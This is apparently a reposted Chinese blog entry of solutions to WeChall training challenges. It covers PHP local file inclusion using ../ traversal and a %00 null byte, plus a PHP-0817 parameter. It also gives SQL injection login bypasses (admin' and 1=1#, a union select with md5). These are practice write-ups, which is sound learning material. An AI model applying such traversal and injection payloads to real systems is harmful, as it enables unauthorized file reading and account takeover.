标签:mysq page username http https byte com file code
PHP - Local File Inclusion
############################### ### Here is your exploit :) ### ############################### $code = ‘$filename = \‘pages/\‘.(isset($_GET["file"])?$_GET["file"]:"welcome").\‘.html\‘;‘; $code_emulate_pnb = ‘$filename = Common::substrUntil($filename, "\\0");‘; # Emulate Poison Null Byte for PHP>=5.3.4 $code2 = ‘include $filename;‘; ### End of exploit ###
将$code后的.html去掉,则可以构造语句截断url编码后%00,另一方面利用../跳转目录
则提交Payload
http://www.wechall.net/challenge/training/php/lfi/up/index.php?file=../../solution.php%00
PHP-0817
Payload:
https://www.wechall.net/challenge/php0817/index.php?which=solution
Training:MYSQL I
Payload:
Username=‘admin‘ and 1=1#
Training:MYSQL II
Payload:
username=admin‘ union select 1,‘admin‘,md5(‘password‘);#
标签:mysq page username http https byte com file code
原文地址:http://www.cnblogs.com/vincebye/p/7113447.html